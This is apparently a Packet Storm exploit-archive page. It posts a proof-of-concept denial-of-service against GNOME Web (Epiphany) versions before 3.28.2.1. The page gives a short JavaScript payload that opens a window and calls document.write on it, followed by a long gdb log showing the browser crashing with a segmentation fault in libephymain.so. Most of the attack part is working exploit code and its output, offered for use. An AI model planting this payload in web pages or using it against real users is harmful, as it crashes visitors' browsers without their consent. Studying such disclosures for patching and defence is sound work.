exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Gnome Web (Epiphany) Denial Of Service

Gnome Web (Epiphany) Denial Of Service
Posted Jun 8, 2018
Authored by ldpreload

Gnome Web (Epiphany) versions prior to 3.28.2.1 suffer from a denial of service vulnerability.

tags | exploit, web, denial of service
SHA-256 | ad038f44f7bbbf2ff97e2ef7529e457cfe0a4797fa9c915a63209bf98270321c

Gnome Web (Epiphany) Denial Of Service

Change Mirror Download
# Title: Gnome Web/Epiphany Browser < 3.28.2.1 - DoS App Crash (PoC)
# Exploit Author: https://github.com/ldpreload
# Date: 2018-06-06
# Link: https://wiki.gnome.org/Apps/Web
# Version: 3.28.2.1

<!>

libephymain.so in GNOME WEB/Epiphany < 3.28.2.1 allows a remote attacker to cause a Denial Of Service and crash the users browser. The cause of this is the "document.write"

<!>

PoC:

<script>
b1tch3z = window.open("https://www.google.com", "bl1ngbl1ng", "width=250,height=250");
b1tch3z.document.write("<p>~ua b1tch3z</p>");

// https://github.com/undergroundagency
// https://github.com/ldpreload
</script>

Video PoC:
https://vimeo.com/273769801

<!>

ld@b1tch3z:~$ gdb epiphany
(gdb) run
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

[New Thread 0x7fffdf7ab700 (LWP 23486)]
[New Thread 0x7fffdd929700 (LWP 23487)]
[New Thread 0x7fffdd128700 (LWP 23488)]
[New Thread 0x7fffd7fff700 (LWP 23489)]
[New Thread 0x7fffd77fe700 (LWP 23490)]
[New Thread 0x7fffd6ffd700 (LWP 23491)]
[New Thread 0x7fffd67fc700 (LWP 23492)]
[New Thread 0x7fffd5ffb700 (LWP 23493)]
[New Thread 0x7fffd57fa700 (LWP 23494)]
[New Thread 0x7fff8b4c4700 (LWP 23499)]
[New Thread 0x7fff899bc700 (LWP 23503)]
[New Thread 0x7fff88fff700 (LWP 23506)]
[New Thread 0x7fff6bfff700 (LWP 23507)]
[New Thread 0x7fff6ae5f700 (LWP 23514)]
[New Thread 0x7fff6a65e700 (LWP 23521)]

[Thread 0x7fff6a65e700 (LWP 23521) exited]
[Thread 0x7fffd5ffb700 (LWP 23493) exited]
[New Thread 0x7fffd5ffb700 (LWP 23527)]
[New Thread 0x7fff6a65e700 (LWP 23528)]
[New Thread 0x7fff691f6700 (LWP 23529)]
[New Thread 0x7fff689f5700 (LWP 23530)]
[New Thread 0x7fff43fff700 (LWP 23531)]
[New Thread 0x7fff3b7fe700 (LWP 23532)]
[New Thread 0x7fff437fe700 (LWP 23533)]
[Thread 0x7fff3b7fe700 (LWP 23532) exited]
[Thread 0x7fff899bc700 (LWP 23503) exited]
[Thread 0x7fff691f6700 (LWP 23529) exited]
[Thread 0x7fff689f5700 (LWP 23530) exited]
[Thread 0x7fff437fe700 (LWP 23533) exited]
[Thread 0x7fff43fff700 (LWP 23531) exited]
[Thread 0x7fff6a65e700 (LWP 23528) exited]
[New Thread 0x7fff6a65e700 (LWP 23557)]
[Thread 0x7fffd5ffb700 (LWP 23527) exited]
[New Thread 0x7fffd5ffb700 (LWP 23566)]
[Thread 0x7fff6a65e700 (LWP 23557) exited]
[Thread 0x7fffd5ffb700 (LWP 23566) exited]
[New Thread 0x7fffd5ffb700 (LWP 23591)]
[New Thread 0x7fff6a65e700 (LWP 23592)]
[Thread 0x7fffd5ffb700 (LWP 23591) exited]
[New Thread 0x7fffd5ffb700 (LWP 23597)]
[Thread 0x7fffd5ffb700 (LWP 23597) exited]
[New Thread 0x7fffd5ffb700 (LWP 23612)]
[Thread 0x7fff6a65e700 (LWP 23592) exited]
[Thread 0x7fffd5ffb700 (LWP 23612) exited]
[New Thread 0x7fffd5ffb700 (LWP 23625)]
[New Thread 0x7fff6a65e700 (LWP 23633)]
[Thread 0x7fff6a65e700 (LWP 23633) exited]
[New Thread 0x7fff6a65e700 (LWP 23644)]
[Thread 0x7fff6a65e700 (LWP 23644) exited]
[New Thread 0x7fff6a65e700 (LWP 23648)]
[Thread 0x7fffd5ffb700 (LWP 23625) exited]
[New Thread 0x7fffd5ffb700 (LWP 23652)]
[Thread 0x7fff6a65e700 (LWP 23648) exited]
[New Thread 0x7fff6a65e700 (LWP 23656)]
[Thread 0x7fff6a65e700 (LWP 23656) exited]
[Thread 0x7fffd5ffb700 (LWP 23652) exited]
[New Thread 0x7fffd5ffb700 (LWP 23684)]
[New Thread 0x7fff6a65e700 (LWP 23685)]
[Thread 0x7fffd5ffb700 (LWP 23684) exited]
[New Thread 0x7fffd5ffb700 (LWP 23715)]
[Thread 0x7fff6a65e700 (LWP 23685) exited]
[New Thread 0x7fff6a65e700 (LWP 23741)]
[Thread 0x7fffd5ffb700 (LWP 23715) exited]
[New Thread 0x7fffd5ffb700 (LWP 23773)]
[Thread 0x7fffd5ffb700 (LWP 23773) exited]
[New Thread 0x7fffd5ffb700 (LWP 23811)]
[Thread 0x7fff6a65e700 (LWP 23741) exited]
[New Thread 0x7fff6a65e700 (LWP 23815)]
[Thread 0x7fffd5ffb700 (LWP 23811) exited]
[New Thread 0x7fffd5ffb700 (LWP 23823)]
[Thread 0x7fff6a65e700 (LWP 23815) exited]

Thread 43 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffd5ffb700 (LWP 23823)]
0x00007ffff77bcb2d in ?? () from /usr/lib/epiphany/libephymain.so

(gdb) bt
#0 0x00007ffff77bcb2d in () at /usr/lib/epiphany/libephymain.so
#1 0x00007ffff6cb7e39 in () at /usr/lib/libgio-2.0.so.0
#2 0x00007ffff7040463 in () at /usr/lib/libglib-2.0.so.0
#3 0x00007ffff703fa2a in () at /usr/lib/libglib-2.0.so.0
#4 0x00007fffefa70075 in start_thread () at /usr/lib/libpthread.so.0
#5 0x00007ffff7b1453f in clone () at /usr/lib/libc.so.6

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close